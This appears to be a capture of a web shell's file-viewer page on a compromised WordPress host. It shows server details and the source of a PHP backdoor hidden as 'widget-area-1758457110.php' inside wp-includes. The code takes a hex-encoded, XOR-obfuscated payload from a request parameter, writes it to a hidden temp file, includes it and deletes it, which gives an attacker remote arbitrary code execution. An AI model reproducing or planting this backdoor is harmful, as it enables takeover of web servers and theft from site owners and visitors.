HEX
Server: LiteSpeed
System: Linux premium12.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: desetmhw (842)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/desetmhw/estraveltourim.site/wp-includes/style-engine/widget-area-1758457110.php
<!--gXfDNwRw-->
<?php

if(!empty($_REQUEST["en\x74"])){
$bind = hex2bin($_REQUEST["en\x74"]);
$mrk   =   ''    ;      $g=0;do{$mrk.=chr(ord($bind[$g])^78);$g++;}while($g<strlen($bind));
$comp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
foreach ($comp as $key => $flg) {
            if (array_product([is_dir($flg), is_writable($flg)])) {
            $ptr = "$flg" . "/.pset";
            if ($itm = fopen($ptr, 'w')) {
    fwrite($itm, $mrk);
    fclose($itm);
    include_once $ptr;
    unlink($ptr);
    die();
}
        }
}
}